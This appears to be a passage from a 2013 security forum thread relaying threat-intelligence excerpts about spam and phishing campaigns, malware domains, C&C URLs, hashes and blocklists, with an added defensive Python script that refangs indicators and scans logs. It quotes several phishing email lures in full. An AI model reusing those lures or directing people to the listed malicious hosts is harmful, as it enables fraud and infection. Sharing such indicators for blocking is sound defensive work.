* https://www.virustotal.com/en/file/8d99f52cd686235919d473b5fbe49c96b22f9fe56d1784b01cdf1b55b87c1b92/analysis/1373309007/
File name: Document_948357853____.exe
Detection ratio: 15/46
Analysis date: 2013-07-08
** https://www.virustotal.com/en/file/cb7ceacc9cdbe1d140026bd2307681c6ba7aef69fd033ff26d588ea066a5d2dc/analysis/1373315068/
File name: ss32.exe
Detection ratio: 8/44
Analysis date: 2013-07-08
*** http://www.threatexpert.com/report.aspx?md5=d0b2d0f5b7e4b7adb6afe6928fa84c89
**** https://www.virustotal.com/en/ip-address/177.185.196.130/information/
:mad: :fear:
AplusWebMaster
2013-07-09, 19:20
FYI...
Malware sites to block 9/7/13
- http://blog.dynamoo.com/2013/07/malware-sites-to-block-9713.html
9 July 2013 - "These are the current IPs and domains that appear to be in use by this gang*. IPs are listed with hosting companies and countries first, and then a plain list of IPs and domains for copy-and-pasting (blocking)..."
(Long list at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Amerika
___
Fake "Payment File Successfully Processed" SPAM / autorize .net.models-and-kits .net
- http://blog.dynamoo.com/2013/07/payment-file-successfully-processed.html
9 July 2013 - "This spam leads to malware on autorize.net.models-and-kits .net:
Date: Tue, 9 Jul 2013 15:36:42 -0500
From: batchprovider @eftps .gov
Subject: Payment File Successfully Processed
*** PLEASE DO NOT REPLY TO THIS MESSAGE***
Dear Batch Provider,
This message is being sent to inform you that your payment file has successfully processed. 2013-07-09-12.08.00.815358
Detailed information is available by logging into the Batch Provider software by clicking this link and performing a Sync request.
Thank You,
EFTPS
Contact Us: EFTPS Batch Provider Customer Service
at this link
A sender's email address of batchprovider @email.eftpsmail .gov is seen in another sample. The link goes through a legitimate -hacked- site and ends up on a malware-laden page at [donotclick]autorize.net.models-and-kits .net/news/shortest-caused-race.php (report here**) hosted on:
77.240.118.69 (Acens Technologies, Spain)
103.9.23.34 (TPL Trakker Ltd, Pakistan)
151.155.25.111 (Novell Inc, US)
202.28.69.195 (UniNet, Thailand)
All these IPs and more can be found in this recommended blocklist*. Out of these four IPs we can see the following malicious domains which should also be blocked if you can't block the IPs themselves..
..."
(More detail at the dynamoo URL above.)
* http://blog.dynamoo.com/2013/07/malware-sites-to-block-9713.html
** http://wepawet.iseclab.org/view.php?hash=3e5eacbb6b311e0669adfaeea9476cb2&t=1373400740&type=js
:fear::fear:
AplusWebMaster
2013-07-10, 15:46
FYI...
Something evil on 199.231.93.182
- http://blog.dynamoo.com/2013/07/something-evil-on-19923193182.html
10 July 2013 - "199.231.93.182 (Webline Service, US suballocated to "Alex Capersov") is hosting a number of exploits [1] [2] being used in injection attacks. In the sample I saw, code had been injected into the legitimate site englishrussia .com possibly through a traffic exchanger. The following domains are all hosted on or are associated with this IP. There's a shorter list at the bottom of the post without the subdomains that you might want to use as a blocklist..."
(More detail at the dynamoo URL above.)
1) http://urlquery.net/search.php?q=199.231.93.182&type=string&start=2013-06-25&end=2013-07-10&max=50
2) https://www.virustotal.com/en/ip-address/199.231.93.182/information/
___
Fake Booking Reservation themed emails serve malware
- http://blog.webroot.com/2013/07/10/cybercriminals-spamvertise-tens-of-thousands-of-fake-your-booking-reservation-at-westminster-hotel-themed-emails-serve-malware/
July 10, 2013 - "Cybercriminals are currently mass mailing tens of thousands of fake emails impersonating the Westminster Hotel, in an attempt to trick users into thinking that they’ve received a legitimate booking confirmation. In reality though, once the socially engineered users execute the malicious attachments, their PCs automatically join the botnet operated by the cybercriminals behind the campaign...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/07/email_spam_malware_malicious_software_social_engineering_westminster_hotel_fake_booking.png?w=465&h=587
Detection rate for the malicious attachment – MD5: 7eed403cfd09ea301c4e10ba5ed5148a * ... Trojan-PSW.Win32.Tepfer.nprd.
The UPX compressed executable creates an Alternate Data Stream (ADS), starts at Windows startup... It then phones back to the following C&C server:
hxxp :// 62.76.178.178 /fexco/com/index.php
We’ve already seen the same C&C directory structure in the previously profiled ‘Fake ‘Vodafone U.K Images’ themed malware serving spam campaign circulating in the wild‘ campaign... While we were investigating this campaign, we also found out that, apparently, the Westminster Hotel in Rhyl, Denbighshire, did not renew their primary domain name (westminster-rhyl.com – 64.74.223.31), allowing opportunistic ‘domainers’ to quickly snatch it. Not surprisingly, we also detected malicious activity with multiple malicious software phoning back to the current hosting IP of the Web site of the Westminster Hotel in Rhyl, Denbighshire...
> https://webrootblog.files.wordpress.com/2013/07/westminster_hotel_rhyl_malware_malicious_software_google_maps.png?w=869
... MD5s known to have phoned back to the same IP (64.74.223.31) ..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/b626adbaf7e78c70ce7d71a91e327afb7a3b7d73ecd7d8f20732c9cb182aa457/analysis/1373366558/
File name: Document.pdf .exe
Detection ratio: 6/47
Analysis date: 2013-07-09
___
Fake Visa SPAM / estateandpropertty.com and clik-kids .com
- http://blog.dynamoo.com/2013/07/visa-spam-estateandproperttycom-and.html
10 July 2013 - "This fake Visa spam attempts to lead to malware on estateandpropertty .com:
Date: Wed, 10 Jul 2013 13:20:38 -0300 [12:20:38 EDT]
From: Visa [policemank3 @newsletters.visabusinessnewsmail .org]
Reply-To: flintierv34 @complains .visabusinessnewsmail .org
Subject: Update Your Business Visa Card Information
Your Visa Business card has been limited. Please update your information to reactivate your account.
Please proceed the link: http ://visabusiness .com/ fraud/warning_mail=81413185766854518964...96368, update necessary information and view further information that caused us to set a limit.
Your Case ID is: NW61826321176497
Look for unexpected charges or questionable activity, and if you see anything suspicious,don't wait to act.
This added security is to prevent any additional fraudulent charges from taking place on your account...
Please be advised that the Information may constitute material nonpublic information under U.S. federal securities laws and that purchasing or selling securities of Visa Inc. while being aware of material nonpublic information would constitute a violation of applicable U.S. federal securities laws. This information may change from time to time. Please contact your Visa representative to verify current information. Visa is not responsible for errors in this publication. The Visa Non-Disclosure Agreement can be obtained from your Visa Account Manager or the nearest Visa Office.
This message was sent to you by Visa, P.O. Box 8999, San Francisco, CA 94128. Please click here to unsubscribe.
The link in the email goes through a legitimate -hacked- site and then attempted to go to a malware page at [donotclick]estateandpropertty .com/news/visa-report.php (report here*) but it appears the registrar has -nuked- the domain, so the spammers have switched the link to [donotclick]clik-kids .com/news/visa-report.php (report here**) instead. IPs involved are:
46.45.182.27 (Radore Veri Merkezi Hizmetleri, Turkey)
77.240.118.69 (Acens Technologies, Spain)
150.244.233.146 (Universidad Autonoma De Madrid, Spain)
203.236.232.42 (KINX, Korea)
209.222.67.251 (Razor Inc, US)
Recommended blocklist: ..."
* http://urlquery.net/report.php?id=3651712
** http://urlquery.net/report.php?id=3653370
:fear::mad:
AplusWebMaster
2013-07-11, 15:01
FYI...
Fake "WTX Media INC" SPAM / dajizzum .com
- http://blog.dynamoo.com/2013/07/wtx-media-inc-spam-dajizzumcom.html
11 July 2013 - "This fake invoice spam from the nonexistent "WTX Media" leads to a malware landing page on dajizzum .com:
From: Rebecca Media [mailto:support @rebeccacella .com]
Sent: 11 July 2013 07:46
To: [redacted]
Subject: Subscription Details
We hereby inform you that your subscription has been activated, your login information is as follows:
Username: IX9322130
Password: X#(@kIE04N
Login Key: 839384
Please do not share the login information with anyone as this account is only for your use, sharing the account will result in account termination without a refund.
The credit card on file submited by you will be billed within 24 hours, in the amount of 499.00 GBP, amount equal to one year unlimited subscription.
Your bank statement will show up as being billed by "WTX Media INC".
If you have any questions or issues with your login as well as requests to upgrade or cancel your membership please contact us using the form at:
[donotclick]www.rebeccacella .com/wp-content/plugins/subscribe/
Any feedback is appreciated as we strive to improve our services constantly.
WTX Media Team
The link in the email goes through a legitimate but -hacked- website (rebeccacella .com) and lands on a malware landing page at [donotclick]dajizzum .com/team/administration/admin4_colon/fedora.php?view=44 (report here*) which contains an exploit kit. dajizzum .com is hosted on 109.123.100.219 (UK2.NET, UK) which appears to be a -hijacked- server. At the moment I can only see that one site hosted on this box, but -blacklisting- the IP as a precaution may be wise. The spam originates from another malware server on 188.138.89.106 (more of this later) but it appears to use a compromised 1&1 account, as the spamvertised domain, sender's address and SMTP relay of 212.227.29.10 all belong to that provider."
* http://urlquery.net/report.php?id=3664350
___
Malware sites to block 11/7/13
- http://blog.dynamoo.com/2013/07/malware-sites-to-block-11713.html
11 July 2013 - "I noticed 188.138.89.106 (Intergenia AG, Germany) was the originating IP being used in this spam run* using a -hijacked- 1&1 account, and VirusTotal thinks that the server is pretty darned evil**. A quick poke at this box shows that it has a number of multihomed malicious and C&C domains. Looking at some of these servers, I'm suspicious that they may have been compromised using a Plesk vulnerability***. Various domains are used for botnets, including some Bitcoin miners. There may be some formerly legitimate domains in this mix, but given the compromised nature of the servers I would not trust them.
37.123.112.147 (UK2.NET, UK)
37.123.113.7 (UK2.NET, UK)
68.169.38.143 (Westhost Inc, US)
68.169.42.177 (Westhost Inc, US)
74.208.133.134 (1&1, US)
85.25.86.198 (Intergenia AG, Germany)
109.123.95.8 (UK2.NET, UK)
188.138.89.106 (Intergenia AG, Germany)
212.53.167.13 (FASTCOM IP Net, Poland)
212.227.53.20 (1&1, Germany)
212.227.252.92 (1&1, Germany)
213.165.71.238 (1&1, Germany)
217.160.173.154 (1&1, Germany)
Recommended blocklist: ..."
* http://blog.dynamoo.com/2013/07/wtx-media-inc-spam-dajizzumcom.html
** https://www.virustotal.com/en/ip-address/188.138.89.106/information/
*** http://threatpost.com/irc-botnet-leveraging-unpatched-plesk-vulnerability
___
Facebook Phish leads to Fake Flash and Mining
- http://www.threattracksecurity.com/it-blog/facebook-phish-leads-to-fake-flash-and-mining/
July 10, 2013 - "... A new scam has emerged, this time using Tumblr as the launchpad to redirect end-users to a Facebook credential phish (including the collection of the answer to a secret question). At the end of the journey, victims will come across a fake Flash Player install touting the same fake landing page the old attack made use of, while adding a fresh sting in the tail. There’s a message which has been seen on some Facebook profiles doing the rounds at the moment, which reads as follows:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/minespam1.jpg
With a link to...
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/minespam2-300x226.jpg
The spamblog Tumblr will attempt to redirect end-users to a -fake- Facebook login:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/minespam3.jpg
After handing over their login, the end-user is then asked to surrender the answer to a security question of their own choosing:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/minespam4.jpg
Finally, they will arrive at the fake Flash player page – identical to the ones used in the 2012 spam runs on Twitter. While the message is the same:
“An update for Youtube player is needed
The Flash player update 10.1 includes
* Smoother video with hardware accelleration support
* Enhanced performance and memory management
* Support for multi-touch and gesture-enabled content
* Private browsing support and security enhancements”
…the downloaded file and intent are rather different.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/minespam5.jpg
Here’s what it looks like on the desktop, along with information from the Properties tab:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/minespam7.jpg
... It appears that once they’re done redirecting you to fake Facebook pages, stealing your login / security question information and loading up a fake video page they then want your PC to go mining (most likely Bitcoin, though the files aren’t displaying much activity at time of writing). The domain involved contains numerous files, some of which are password protected and won’t be downloadable unless the infected PC is following the correct “steps”. A compromised machine will attempt to download a proxy and a miner..."
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/minespam8.jpg
:fear: :mad: :fear:
AplusWebMaster
2013-07-12, 18:03
FYI...
Fake TAX Return Reminder SPAM / cpa.state.tx .us.tax-returns.mattwaltererie .net
- http://blog.dynamoo.com/2013/07/tax-return-reminder-cpastatetxustax.html
12 July 2013 - "This fake tax return reminder leads to malware on cpa.state.tx.us.tax-returns.mattwaltererie .net:
--- Version 1 --------------------
Date: Fri, 12 Jul 2013 14:35:31 +0300
From: DO.NOT.REPLY @REMINDER.STATE .TX .US.GOV
Subject: TAX Return Reminder
After the last quarter calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of $964.17. Please submit the tax refund request and allow us 2-5 business days to process it.
A refund can be delayed for a variety of reasons.
For example submitting invalid records or applying after deadline
Returns can be electronically filed at www .cpa.state.tx .us/returns_caseid=035549412645
For security reasons we will record your IP address, date and time.
Deliberate scam inputs are criminally pursued and indicated.
Please do not reply to this e-mail.
Please disregard this reminder if the return has already been submitted.
--- Version 2 --------------------
Date: Fri, 12 Jul 2013 17:05:39 +0530 [07:35:39 EDT]
From: tax.help @STATE.TX .GOV .US
Subject: TAX Return Reminder
After the last quarter calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of $909.70. Please submit the tax refund request and allow us 2-3 business days to process it.
A refund may be delayed for a variety of reasons.
For example submitting invalid records or applying after deadline
Returns can be electronically filed at www .cpa.state.tx .us/returns_caseid=488702484517
For security reasons we will record your IP address, date and time.
Deliberate wrong inputs are criminally pursued and indicated.
Please do not reply to this e-mail.
Please disregard this reminder if the return has already been submitted.
Unusually, the link in the email goes directly to the malware landing page rather than going through a legitimate -hacked- site, in this case directly to [donotclick]cpa.state.tx.us.tax-returns.mattwaltererie .net/news/tax_refund-caseid7436463593.php?[snip] (example 1*, example 2**) but I cannot get the malware to reveal itself (there's either a fault or it is resistant to analysis).
cpa.state.tx.us.tax-returns.mattwaltererie .net is hosted on the following IP addresses that are under control of what I call the Amerika gang:
46.45.182.27 (Radore Veri Merkezi Hizmetleri A.S., Turkey)
150.244.233.146 (Universidad Autonoma de Madrid, Spain)
203.236.232.42 (KINX, Korea)
209.222.67.251 (Razor Inc, US)
The domain mattwaltererie .net also features the fake US WHOIS details that are characteristic of the Amerika gang (which is where they get their name from)...
Below is a partial blocklist that I would recommend you use in conjunction with this one: ..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=3689715
** http://urlquery.net/report.php?id=3688402
:sad::mad::fear:
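Added example (not code from dynamoo, ThreatTrack, Webroot or any of the quoted blogs): a defender-side helper that refangs the obfuscated indicators used throughout this thread ("[donotclick]", "hxxp ://", "paynotice07 .net", "(dot)") into a host and IP blocklist and checks proxy log lines against it. The feed entries are copied, still defanged, from the posts above; the log lines and the log format are constructed.

```python
"""Refang the defanged indicators quoted in this thread into a blocklist and
check proxy log lines against it.  Added example: not code from dynamoo,
ThreatTrack, Webroot or any of the quoted blogs."""
import re
from ipaddress import ip_address
from urllib.parse import urlsplit

# Defanging conventions that appear in the quoted posts:
#   "[donotclick]" prefix, "hxxp ://" schemes, a space before the TLD
#   ("paynotice07 .net"), and "(dot)"/"(DOT)" standing in for ".".
_DOT_RE = re.compile(r"\s*\(dot\)\s*", re.IGNORECASE)
_SPACED_DOT_RE = re.compile(r"\s+\.(?=[A-Za-z0-9])")
_SCHEME_RE = re.compile(r"^(hxxps?|https?|ftp)\s*:\s*/\s*/\s*", re.IGNORECASE)


def refang(indicator: str) -> str:
    """Turn a defanged indicator back into a plain URL or host/path string."""
    s = indicator.strip()
    for tag in ("[donotclick]", "[donoclick]"):  # second form is a typo in one post
        s = s.replace(tag, "")
    s = _DOT_RE.sub(".", s)
    s = _SPACED_DOT_RE.sub(".", s)
    m = _SCHEME_RE.match(s)
    if m:
        scheme = m.group(1).lower().replace("hxxp", "http")
        s = scheme + "://" + s[m.end():]
    return re.sub(r"\s+", "", s)  # e.g. "62.76.178.178 /fexco/..." -> no gap


def host_of(url_or_path: str) -> str:
    """Hostname (lower-cased) of a URL, or of a bare 'host/path' string."""
    url = url_or_path if "://" in url_or_path else "http://" + url_or_path
    return (urlsplit(url).hostname or "").lower()


def build_blocklist(indicators):
    """Split refanged indicators into a set of hostnames and a set of IPs."""
    hosts, ips = set(), set()
    for ind in indicators:
        host = host_of(refang(ind))
        if not host:
            continue
        try:
            ip_address(host)
            ips.add(host)
        except ValueError:
            hosts.add(host)
    return hosts, ips


def find_hits(log_text: str, hosts, ips):
    """Return (timestamp, client, host, reason) for each log line whose host
    is a listed IP, a listed hostname, or a subdomain of a listed hostname."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        host = host_of(fields[3])
        if host in ips:
            reason = "ip"
        elif any(host == b or host.endswith("." + b) for b in hosts):
            reason = "host"
        else:
            continue
        hits.append((fields[0], fields[1], host, reason))
    return hits


# Indicators copied verbatim (still defanged) from the posts in this thread.
FEED = [
    "[donotclick]paynotice07 .net/news/must-producing.php",
    "[donoclick]americanexpress .com.krasalco .com/news/slightly_some_movie.php",
    "ah-nanas .se/main.php?inf=ss00_323",
    "ftp(DOT)vickibettger .com/oEoASW64.exe",
    "hxxp :// 62.76.178.178 /fexco/com/index.php",
    "[donotclick]cpa.state.tx.us.tax-returns.mattwaltererie .net/news/tax_refund-caseid7436463593.php",
]

# Constructed proxy log, "timestamp client method url status" (not real traffic).
# The www.cpa.state.tx.us line is the domain the tax lure imitates and must NOT
# match: suffix matching only catches subdomains of a listed host, never parents.
SAMPLE_LOG = """\
2013-07-08T15:02:11 10.0.0.12 GET http://www.example.org/index.html 200
2013-07-08T15:02:14 10.0.0.12 GET http://americanexpress.com.krasalco.com/news/slightly_some_movie.php 200
2013-07-08T15:03:40 10.0.0.27 GET http://ah-nanas.se/main.php?inf=ss00_323 200
2013-07-10T09:11:02 10.0.0.31 POST http://62.76.178.178/fexco/com/index.php 200
2013-07-12T11:40:09 10.0.0.44 GET http://www.cpa.state.tx.us/returns.php 200
2013-07-12T11:41:30 10.0.0.44 GET http://cdn.paynotice07.net/news/must-producing.php 200
"""

if __name__ == "__main__":
    hosts, ips = build_blocklist(FEED)
    for ts, client, host, reason in find_hits(SAMPLE_LOG, hosts, ips):
        print(f"{ts} {client} -> {host} ({reason} match)")
```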
AplusWebMaster
2013-07-15, 15:36
FYI...
Spamvertised emails lead to Casino PUAs
- http://blog.webroot.com/2013/07/15/tens-of-thousands-of-spamvertised-emails-lead-to-the-win32primecasino-pua-potentially-unwanted-application/
July 15, 2013 - "... You may want to skip the rogue online casinos... Over the past few days, we intercepted multiple spam campaigns launched by the same party, enticing users into downloading -fake- online casinos most commonly known as the Win32/PrimeCasino/Win32/Casonline PUA (Potentially Unwanted Application)...
Sample screenshots of the landing pages:
> https://webrootblog.files.wordpress.com/2013/07/email_spam_royalvegas_w32-casonline_fake_casino_rogue_casino_potentially_unwated_application_pua.png?w=675&h=536
> https://webrootblog.files.wordpress.com/2013/07/email_spam_royalvegas_w32-casonline_fake_casino_rogue_casino_potentially_unwated_application_pua_01.png?w=711&h=532
> https://webrootblog.files.wordpress.com/2013/07/email_spam_royalvegas_w32-casonline_fake_casino_rogue_casino_potentially_unwated_application_pua_02.png?w=741&h=328
... (More screenshots shown at the first webroot URL above.) ...
Rogue domains reconnaissance:
royalvegascasino .com – 193.169.206.146
888casino .com – 213.52.252.59
spinpalace .com – 109.202.114.65
riverbelle1 .com – 193.169.206.233
alljackpotscasino .com – 64.34.230.122
luckynuggetcasino .com – 67.211.111.163
allslotscasino .com – 64.34.230.149; 205.251.192.125; 205.251.195.210; 205.251.196.131; 205.251.199.63 ...
Detection rates for the Potentially Unwanted Applications (PUAs):
AllJackpots.exe – MD5: fed4e5ba204f3b3034b882481a6ab002 ... Win32/PrimeCasino; W32/Casino.P.gen!Eldorado; PUP.PrimeCasino
luckynugget.exe – MD5: 1e97ddc0ed28f5256167bd93f56a46b2 ... GAME/Casino.Gen; W32/Casino.P.gen!Eldorado;
Riverbelle.exe – MD5: 1828fc794652e653e6083c204d3b1f34 ... GAME/Casino.Gen; W32/Casino.P.gen!Eldorado
RoyalVegas.exe – MD5: 2dd87b67d4b7ca7a1bfae2192b09f8e6 ... GAME/Casino.Gen; W32/Casino.P.gen!Eldorado
Rogue casino domains... responded to 193.169.206.146 ..."
(More detail at the first webroot URL above.)
___
Half-Life 3 Fakeout...
- http://www.threattracksecurity.com/it-blog/the-half-life-3-fakeout-roundup/
July 15, 2013 - "Half-Life 3: it doesn’t exist. This short, brutal truth doesn’t mean there aren’t a lot of Half Life 3 fakeouts doing the rounds. For example, here’s a fake Steam Store page located at store(dot)stearnpowered(dot)com... The real thing would be store(dot)steampowered(dot)com – they’re likely banking on end-users not noticing the join between the “r” and the “n”... There’s a lot of so-called “Half-Life 3 giveaway” sites online, and – amazingly enough – -none- of those sites are going to give you Half-Life 3... Halflife3beta(dot)com, which takes the tried and tested survey scam route (complete with fake “Downloads allowed” graphic at the bottom of the survey splash)... If and when Half-Life 3 ever arrives, the first you hear about it won’t be on some obscure domains serving up deals and offers. Keep your wits, your skepticism and your crowbar handy…"
Fake Wiki in the Wild Wild Web
- http://www.threattracksecurity.com/it-blog/fake-wiki-in-the-wild-wild-web/
July 15, 2013 - "If you happen to make a mess of typing up the Wikipedia domain, you could in theory wind up at the following address which is clearly hoping for some finger-related typo malfunction traffic: wikipeida(dot)org
As you can see, it isn’t far off from the real thing. What lurks there? This:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/fakewiki1.jpg
... The end-user is presented with 3 meaningless questions then asked to choose their final “I’m being marketed to” destination... As far as typosquatting well known sites with the intention of driving traffic to surveys goes, this is a well worn trick and – one would hope – not something a person looking for Wikipedia would fall for..."
___
NOST (NOST.QB) / NSU Resources Inc Pump and Dump SPAM
- http://blog.dynamoo.com/2013/07/nostqb-nsu-resources-inc-pump-and-dump.html
15 July 2013 - "Over the weekend a pump-and-dump spam* run started for NSU Resources Inc trading as NOST.QB **. NSU Resources almost definitely have -nothing- to do with this spam run...
Subject: This Stock MOVED HARD...
Subject: This Stock Is The Hottest Stock In The Whole Market!...
Subject: They`ve got their rally caps on!...
Subject: Look for Another Push Higher...
... we can expect to see NOST spam for a while yet as the spammer - and perhaps whoever employed them - try to offload worthless shares onto unsuspecting investors. Avoid."
* http://en.wikipedia.org/wiki/Pump_and_dump
** http://www.nasdaq.com/symbol/nost
___
Bank of America Paymentech SPAM
- http://threattrack.tumblr.com/post/55513649492/bank-of-america-paymentech-spam
15 July 2013 - "Subjects Seen:
Merchant Statement
Typical e-mail details:
Attached (pdflPDF|pdf file|document|file) is your Bank of America Paymentech electronic Merchant Billing Statement.
If you need assistance, please (contact|message|call) your Account Executive or call Merchant Services at the telephone number listed on your statement.
PLEASE DO NOT RESPOND BY USING REPLY. This (email|mail) is sent from an unmonitored email address, and your response will not be received by Bank of America Paymentech.
Bank of America Paymentech will not be responsible for any liabilities that may result from or relate to any failure or delay caused by Bank of America Paymentech’s or the Merchant’s email service or otherwise. Bank of America Paymentech recommends that Merchants continue to monitor their statement information regularly.
Malicious File Name and MD5:
stid <random>.zip (d8f8701b9485f7a2215da9425c5af7d6)
stid <random>.exe (198385457408361504c7ccac9d67bd3e)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/1017d3aa7507cd96fe605fb53643b9ce/tumblr_inline_mpzfdgPrth1qz4rgp.png
___
Fake UPS SPAM / tvblips .net
- http://blog.dynamoo.com/2013/07/ups-spam-tvblipsnet.html
15 July 2013 - "This fake UPS spam leads to malware on tvblips .net:
Date: Mon, 15 Jul 2013 10:20:13 -0500
From:
Subject: Your UPS Invoice is Ready
This is an automatically generated email. Please do not reply to this email address.
Dear UPS Customer,
Thank you for your business.
New invoice(s) are available for the consolidated payment plan(s) / account(s) enrolled in the UPS Billing Center.
Please visit the UPS Billing Center to view and pay your invoice.
Questions about your charges? To get a better understanding of surcharges on your invoice, click here..."
The link in the email goes to a legitimate -hacked- site that has some highly obfuscated javascript that leads to a malware landing page on [donotclick]tvblips .net/news/ups-information.php (report here*) hosted on:
46.45.182.27 (Radore Veri Merkezi Hizmetleri, Turkey)
209.222.67.251 (Razor Inc, US)
Recommended blocklist:
46.45.182.27
209.222.67.251 ..."
* http://urlquery.net/report.php?id=3762051
___
Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Bank Payment Information Email Message - 2013 Jul 15
Fake Shipping Invoice Notification Email Messages - 2013 Jul 15
Email Messages with Malicious Attachments - 2013 Jul 15
Fake Bank Payment Confirmation Email Messages - 2013 Jul 15
Fake Bank Deposit Confirmation Email Messages - 2013 Jul 15
Fake CashPro Online Digital Certificate Notification Email Message - 2013 Jul 15
Fake Online Dating Proposal Email Messages - 2013 Jul 15
Fake Product Quote Request Email Messages - 2013 Jul 15
Fake Order Document Email Attachment Messages - 2013 Jul 15
Fake Photo Email Messages - 2013 Jul 15
Fake Canceled Electronic Payment Notification Email Message - 2013 Jul 15
Fake Telegraphic Transfer Notification Email Messages - 2013 Jul 15
Fake Receipt Attachment Email Messages - 2013 Jul 15
Fake Purchase Order Notification Email Messages - 2013 Jul 15
Fake Billing Statement Email Messages - 2013 Jul 15
Fake Financial Document Delivery Email Messages - 2013 Jul 15
Fake CashPro Online Digital Certificate Notification Email Messages - 2013 Jul 15
Fake Product Order Email Messages - 2013 Jul 15
Fake Money Transfer Notification Email Messages - 2013 Jul 15
(More detail and links at the cisco URL above.)
:fear::mad::fear:
AplusWebMaster
2013-07-16, 15:43
FYI...
Malware sites to block 16/7/13
- http://blog.dynamoo.com/2013/07/malware-sites-to-block-16713.html
16 July 2013 - "These domains and IPs are associated with this gang*. This time there appear to be some diet pill sites in the mix, these may be spammy or they may be malicious.. I would recommend blocking them -all- ..."
(Long list available at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Amerika
___
Photo Attachment Spam
- http://threattrack.tumblr.com/post/55603808587/photo-attachment-spam
July 16, 2013 - "Subjects Seen:
my undressed image is attached
Typical e-mail details:
zdjakinuii fgcaba rjgvsy
vyjxsvlsa luoans vnlfo
aovkq I R W Q G A L S C M R
caeqmjj W R P L P D A F
Malicious File Name and MD5:
mypic62.zip (f2845f8eeeb5e8b2985fdd2c7636bc39)
mypic.vcr (118980814772348b8e42a5166a4dc2a1)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/2d8334b0fd78346352826324fe2d9b07/tumblr_inline_mq1a30XZRB1qz4rgp.png
___
Fake Invoice SPAM / doc201307161139482.doc
- http://blog.dynamoo.com/2013/07/invoice-48920-spam-doc201307161139482doc.html
16 July 2013 - "This spam has a malicious word attachment, doc201307161139482.doc which contains an exploit.
From: Carlos Phillips [accounting @travidia .com]
Subject: Invoice 48920
Thanks !!
Greg
Precision Assemblies Products, Inc.Llc.
179 Nesbitt Hills
Holley, NY 51902
(176)-674-6500
nightmarewdp50 @travidia .com
Note that the date is included in the filename. The document has an MS12-027 exploit with a VirusTotal detection rate of just 5/47*. In theory, if your copy of Microsoft Word is up-to-date you should be immune to this...
UPDATE: The ThreatTrack report [pdf**] shows similar characteristics, including an attempted download from [donotclick]mycanoweb .com/report/doc.exe which is a Zbot variant with a low detection rate***... Most of the IPs for mycanoweb .com overlap with those belonging to the Amerika gang. The other two IPs are shared hosting and might block a relatively small number of legitimate sites.. I would lean towards blocking them now and unblock them later if there's a problem.
Recommended blocklist:
mycanoweb .com
classified.byethost11 .com
myhomes.netau .net
46.45.182.27
50.97.253.162
59.126.142.186
188.40.92.12
209.222.67.251
209.190.24.9
31.170.160.129
Additional IPs for Zbot component:
182.237.17.180
194.44.219.226
210.56.23.100 ..."
* https://www.virustotal.com/en-gb/file/8ae7ae35c37a618031c3ec0702871dc19c817bff4e5cf54f1169182fdc8d878c/analysis/
** http://www.dynamoo.com/files/analysis_31740_935e5cacde136d006ea1bb1201a3e6ef.pdf
*** https://www.virustotal.com/en-gb/file/ac5b73189bfdd5d282778c067f0fa986aaeab295375a0d85c2a2e027f632e3b6/analysis/1373989372/
___
Dun and Bradstreet Attachment Spam
- http://threattrack.tumblr.com/post/55605735892/dun-and-bradstreet-attachment-spam
July 16, 2013 - "Subjects Seen:
FW : Complaint - <random>
Typical e-mail details:
Dun & Bradstreet has received the above-referenced complaint from one of your customers regarding their dealings with you. The details of the consumer’s concern are included on the reverse. Please review this matter and advise us of your position.
In the interest of time and good customer relations, please provide the DnB with written verification of your position in this matter by June 8, 2013. Your prompt response will allow DnB to be of service to you and your customer in reaching a mutually agreeable resolution. Please inform us if you have contacted your customer directly and already resolved this matter...
We encourage you to print this complaint (attached file), answer the questions and respond to us.
We look forward to your prompt attention to this matter.
Malicious URLs
b-markenergy .com/ponyb/gate.php
arizonaenergysuppliers .com/ponyb/gate.php
alabamaenergysuppliers .com/ponyb/gate.php
bemarkenergy .com/ponyb/gate.php
costruzionimediterraneo .it/FP0gd6.exe
preview.vibration-trainers .com/V2YE.exe
Malicious File Name and MD5:
Case_<random>.zip (b3f17fd862e5e7C617240251be8de706)
Case_<random>.exe (59ee4453da8909e96762f2c8cd0d6f37)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/41b690466827e81b5411fff564d83ed5/tumblr_inline_mq1bpz6ea31qz4rgp.png
___
Spamvertised Payroll themed emails lead to malware
- http://blog.webroot.com/2013/07/16/spamvertised-vodafone-u-k-mms-idfake-sage-50-payroll-themed-emails-lead-to-identical-malware/
July 16, 2013 - "We’ve intercepted two, currently circulating, malicious spam campaigns enticing users into executing the malicious attachments found in the fake emails. This time the campaigns are impersonating Vodafone U.K or pretending to be a legitimate email generated by Sage 50's Payroll software...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/07/email_spam_fake_spamvertised_malware_malicious_software_social_engineering_payslip_sage50.png
... What’s particularly interesting about these two campaigns is the fact that they’ve both been launched by the same cybercriminal/gang of cybercriminals. Not only do the campaigns use an identical MD5 with two previously profiled malicious spam campaigns, but also, all the MD5s phone back to the same C&C server - hxxp:// 62.76.178.178 /fexco/com/index.php
Detection rate for the unique MD5 used in the fake Vodafone U.K MMS themed campaign: 4e9d834fcc239828919eaa7877af49dd * ... Backdoor.Win32.Androm.abrz; Troj/Agent-ACLZ..."
* https://www.virustotal.com/en/file/b5f0426350db94a6ff7706bf67444d2af7334574a5da96dc7a0d01def966fd16/analysis/
File name: vt-upload-b6gNq
Detection ratio: 8/47
